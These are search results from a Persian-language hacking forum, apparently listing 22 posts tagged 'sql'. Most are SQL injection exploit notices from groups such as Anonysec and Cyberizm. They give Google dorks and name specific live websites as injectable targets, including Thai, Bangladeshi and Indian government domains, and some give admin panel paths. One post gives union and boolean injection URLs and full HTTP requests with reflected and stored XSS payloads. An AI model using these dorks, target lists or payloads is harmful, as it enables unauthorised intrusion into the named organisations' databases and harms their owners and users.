امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sql'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

187 نتیجه پیدا شد

  1. Pro-Exploit

    # Exploit Title: EZ Launch - SQL Injection # Google Dork: Powered By EZ SiteLaunch LTD ext:asp # Date: 17/09/2018 # Author: Rednofozi # Team: https://anonysec.org # Tested on: Windows 10 x64 # Vendor Homepage: http://www.ezsitelaunch.com/ # Software Link: http://www.realestatewebtemplates.com/ *************************************************** [+] Vulnerable File: main.asp [+] Parameter: ID ====== [+] Test: ====== [+] localhost/main.asp?id=1' ======== [+] Returns: ======== [+] Microsoft Access Database Engine error '80040e14' [+] Syntax error (missing operator) in query expression 'mainID = 1'''. [+] /main.asp, line 27 *************************************************** iran anonysec hackers *************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2037
  2. Pro-Exploit

    [+] Title :- Powered by CIA UsA SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by:CIA' inurl:.php id=' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.bapujidental.edu [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= demo Injection Injection sql http://www.bapujidental.edu/gallery.php?id=7%27 Injection http://www.bpc.gov.bd/contactus.php?id=13%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2034
  3. [+] Title :- Powered by Special Branch Bangladesh Police SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by: Special Branch, Bangladesh Police inurl:.php id=' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.immi.gov.bd/ [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= demo Injection Injection sql http://www.immi.gov.bd/news.php?RecordNo=7%27 Injection http://www.bpc.gov.bd/contactus.php?id=13%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2035
  4. Pro-Exploit

    http://www.exploit4arab.org/exploits/2032 [+] Title :- Powered by:Nasa . SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by:nasa' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.platinumplace.co.th [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1013''' at line 1 ============================================================================ Tested on (: Injection test http://www.safersex.co.za/index.php?id=22%27 Injection http://www.dynatekbikes.com/news.php?id=10%27 Injection http://www.platinumplace.co.th/project/gallery.php?id=1%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  5. Pro-Exploit

    +] Title :- Designed By Sex . SQL Injection [+] Date :- 2018-09-12 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Designed by sex'' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.safersex.co.za [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= ============================================================================ Tested on (: http://www.safersex.co.za/index.php?id=22%27 Injection https://lgbttobacco.org/resources.php?ID=22%27 Injection http://www.valepackaging.ca/zoom-admin/index.php Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2031
  6. [+] Title :- Photo Organizer - XSS and SQL Vulnerabilities [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :- http://po.shaftnet.org/ [+] Version :- All Versions [+] Software Link: :- http://po.shaftnet.org/#download [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"Powered by Photo Organizer" [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ########################################################  0x01# ~ Introduction ==================== At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository. 0x02# ~ Exploitation ==================== 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Boolean SQL Injection & Blind [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 http://site.com/user.php?user=1 and 1=2 http://site.com/user.php?user=1 union select 1,2-- http://site.com/user.php?user=-1 OR 17-7=10 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Reflected XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):login.php search.text.general.php login.php?operation=get_email register.php ========================== HTTP REQUEST XSS 1 ============================== Host site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 113 POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0 XSS Proof Image: http://i.imgur.com/VmbmuiZ.png ============================================================================ ========================== HTTP REQUEST XSS 2 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/search.text.general.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 109 POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0 XSS Proof Image: http://i.imgur.com/PDcO50Y.png ============================================================================ ========================== HTTP REQUEST XSS 3 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/login.php?operation=get_email Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0 XSS Proof Image: http://i.imgur.com/MFc5unu.png ============================================================================ ========================== HTTP REQUEST XSS 4 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/register.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 207 POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0 XSS Proof Image: http://i.imgur.com/7T4WZMW.png ============================================================================ 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 0 [+] Persistent XSS Cross Site Scripting [+] 0 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 Affected path(s):album.add.php?parent= ========================== HTTP REQUEST XSS 5 ============================== Host: site.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Referer: http://site.com/album.add.php?parent= Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 132 POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0 XSS Proof Image: http://i.imgur.com/TrzBqXJ.png ============================================================================ -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2026
  7. [+] Title :- Designed and Developed By Cloud Innovators Solution SQL Injection Vulnerability [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :-http://www.atrium.com.pk [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'intext:'' Designed and Developed By Cloud Innovators Solution'' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.atrium.com.pk/Gallery.php?ID=4%27 (___SQL Injection___) https://www.sellup.pk/Page.php?ID=1 (___SQL Injection___) http://www.atrium.com.pk/Shopping.php?ID=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2023
  8. [+] Title :- Designed by online store SQL Injection Vulnerability [+] Date :- 2018-09-09 [+] Vendor Homepage :- http://www.jdcaravan.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id= online store' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.jdcaravan.com/store.php?id=1%27 (___SQL Injection___) https://www.bradfordshoes.com/product.php?cat_id=5%27 (___SQL Injection___) http://www.samarpanbharat.org/read_full_news.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow Like us on Facebook : http://www.exploit4arab.org/exploits/2022
  9. [+] Title :- Website Developed by tanzania SQL Injection Vulnerability [+] Date :- 2018-09-07 [+] Vendor Homepage :- http://www.suhailtours.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id=1 tanzania' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demos http://www.imd.gov.in/pages/obs_network.php?id=16%27 (___SQL Injection___) http://www.suhailtours.com/restaurants_list.php?id=2%27 (___SQL Injection___) http://www.samarpanbharat.org/read_full_news.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2021
  10. |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*| |[+] Exploit Title: webmaster: jirka@gaysport.cz SQL Injection |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*| |[+] Exploit Author: Bl4ck M4n |[+] und3rgr0und Telegram @Bl4ckHack |[+] Tested on: Windows 8 , parrot os |[+] saeid.saeid081@gmail.com |[+] joker_s_hack_s@yahoo.com ----------------------------------------------------------------------------- |[+] search google Dork : "webmaster: jirka@gaysport.cz" ----------------------------------------------------------------------------- |[+] Vendor site: http://www.gaysport.cz/ |[+] Demo: Sql |[+] http://www.gaysport.cz/index.php?id=2 |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|
  11. ################################################################################################# # Exploit Title : Powered By invitroestudio Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : invitroestudio.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By invitroestudio'' site:ar # Exploit : /productos-grid.php?idsubcat=[SQL Injection] /productos-grid.php?idsubcat=[ID-NUMBER]&marca=Taloffice&orden=[ID-NUMBER]&desde=[SQL Injection] ################################################################################################# # Example Site => clipers.com.ar/productos-grid.php?idsubcat=14%27 => [ Proof of Concept ] => archive.is/D2ATZ clipers.com.ar/productos-grid.php?idsubcat=14&marca=Taloffice&orden=3&desde=0%27 # SQL Database Error => Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home2/cliper/public_html/productos-grid.php on line 891
  12. ################################################################################################# # Exploit Title : Diseño y Desarrollo LastClick Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : lastclick.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Desarrollo: www.lastclick.com.ar | Corrientes - Argentina'' Admin Control Panel Path => /admin/index.php # Exploit : /seccion.php?pagina=[SQL Injection] /seccion.php?pagina=[ID-NUMBER]&id=[SQL Injection] /ver_nota.php?id=[SQL Injection] ################################################################################################# # Example Site => saladasinforma.com.ar/seccion.php?pagina=437&id=3%27 => [ Proof of Concept ] => archive.is/7q7Xe # SQL Database Error => Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/saladasi/public_html/objetos/DBConnection.php on line 209
  13. ################################################################################################# # Exploit Title : Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : nakhonkorat.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By :: PAS World Communitcation,.ltd. AND nakhonkorat.com'' # Admin Control Panel Path => /admin/index.php # Exploit : /news.php?cat_id=[SQL Injection] /detail.php?id=[SQL Injection] ################################################################################################# # Example Site => talasupcity.go.th/news.php?cat_id=1%27 => [ Proof of Concept ] => archive.is/3iibd lamkaen.go.th/news.php?cat_id=14%27 suankluay.go.th/detail.php?id=251%27 klongkiew.go.th/detail.php?id=1%27 thungwa.go.th/detail.php?id=1%27 bangpradaeng.go.th/detail.php?id=1%27 sunthornphu.go.th/detail.php?id=1%27 senauthai.go.th/detail.php?id=1%27 chedihak.go.th/detail.php?id=1%27 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' ORDER BY d_date DESC, created' at line 1
  14. ################################################################################################# # Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : bizpotential.com ~ ewtadmin.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dorks : inurl:''/ewtadmin/'' site:go.th inurl:''/main.php?filename='' site:go.th inurl:''/ewtadmin/ewt/ccs/'' intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.'' intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved'' ################################################################################################# # Admin Control Panel Paths => /ewtadmin/index.php /ewtadmin82/ /ewtcommittee/index2331.php /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php # SQL Injection Exploit : /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection] /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection] /more_news.php?offset=[SQL Injection] /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection] ################################################################################################# # Webboard Exploit : /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard # Webboar Directory Path : /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# # Example Site => Thailand Government Chachoengsao Cooperative Auditing Office cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# Thailand Government Department of Mineral Sources # Example Sites => dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] => dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] => archive.is/bUcka # SQL Database Error => SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1 Thailand Government Office of Consumer Protection Board # ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3 Thailand Government Ministry of Culture and Cooperatives - Auditing Department # cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] => archive.is/a4XYx # SQL Database Error => Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101 SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1
  15. ==================================================================================================================================== | # Title : brsis sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.brsis.com.br/ | | # Dork : "Produzido por Brsis" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] http://www.jj.ind.br/produtos.php?idlinha=2 <=== inject here [+] http://www.jj.ind.br/extranet/index.php <==== Panel
  16. ################################################################################################# # Exploit Title : Diseño y Desarrollo D&H Soluciones Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : dyhsoluciones.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Diseño y Desarrollo: D&H Soluciones'' # Exploit : /productos-listado.php?_pagi_pg=[SQL Injection] /producto.php?id=[SQL Injection] ################################################################################################# # Example Site => mapaequipamientos.com.ar/productos-listado.php?_pagi_pg=357' => [ Proof of Concept ] => archive.is/ycpMz # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mapa/public_html/inc/productos-listado.php on line 63 Error en la consulta de conteo de registros: SELECT COUNT(*) FROM contenido_web inner join contenido_web_x_categorias on contenido_web.id = contenido_web_x_categorias.idContenido where contenido_web_x_categorias.idCategorias = 38 order by contenido_web.fecha desc. Mysql dijo: Table 'mapa_dyhcms.contenido_web' doesn't exist
  17. ################################################################################################# # Exploit Title : Sitio oficial de Jeep® Argentina Powered By Turnos SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : jeep.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''©2017 FCA US LLC. Todos los derechos reservados.Chrysler, Dodge, Jeep, Ram, Mopar y SRT son marcas registradas de FCA US LLC.'' Admin Control Panel Path => /admin/ # Exploit : /index.php?action=turnos&id_actividad=[SQL Injection] /index.php?action=turnos&id_actividad=[ID-NUMBER]&id_vehiculo=&year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&desde=[ID-NUMBER]&hasta=[SQL Injection] ################################################################################################# # Example Site => offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3%27 => [ Proof of Concept ] => archive.is/c9aOS offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3&id_vehiculo=&year=2019&month=02&day=20&desde=1800&hasta=2130%27 => [ Proof of Concept ] => archive.is/rAbHR # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/adminh4/public_html/turnos.php on line 20 mysql_error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  18. [+] Title :- JET Database Germany SQL Injection Vulnerability [+] Date :- 2018-09-07 [+] Vendor Homepage :- www.spruehwerk.de [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"JET Database" +site:de [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.spruehwerk.de/new/galerie/Innen/0xp3xr07vv220.htm ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2018
  19. [+] Title :- Designed & Developed by france SQL Injection Vulnerability [+] Date :- 2018-09-06 [+] Vendor Homepage :- http://www.romanianwriters.ro/ [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- site .fr inurl .php id=1 [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demoshttp://www.romanianwriters.ro/s.php?id=1%27 (___SQL Injection___) http://www.com2go.com/index.php?id=26%27 (___SQL Injection___) https://www.dt-shop.com/index.php?id=3&L=1' (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2017
  20. [+] Title :- Designed & Developed by qatar SQL Injection Vulnerability [+] Date :- 2018-09-06 [+] Vendor Homepage :- http://www.merjs-qatar.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id=1 qatar' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demos http://www.supremetech.me/services.php?id=24%27 (___SQL Injection___) http://hdecoqatar.com/gallery.php?id=1%27 (___SQL Injection___) http://www.merjs-qatar.com/projects.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2016
  21. ###################################################### # Title : Web Design .sa.php saudi arabia www.azdan.com.sa Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.azdan.com.sa # Google Dork: '.sa.php id=' ###################################################### # Search google Dork : '.sa.php id=' # inject sql codes ...... #Demo : http://www.ftc.com.sa/group-info.php?id=13%27' (Sql Injection) http://www.pumps-hv.com/news.php?id=218%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2015
  22. ###################################################### # Title : Web Design saudi hotels Sql injection Vulnerability # Author : AnonySec # category : webapps # Tested On : Win 10 , Kali Linux # my team: www.anonysec.org # Vendor HomePage : www.retajalrayyan.com # Google Dork: 'php id= saudi hotels' ###################################################### # Search google Dork : 'php id= saudi hotels' # inject sql codes ...... #Demo : http://www.retajroyaledoha.com/offer.php?id=13%27' (Sql Injection) http://www.retajalrayyan.com/offer.php?id=22%27' (Sql Injection) # Discovered by : Moeein Seven | www.moeein.ir #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team..... http://www.exploit4arab.org/exploits/2014
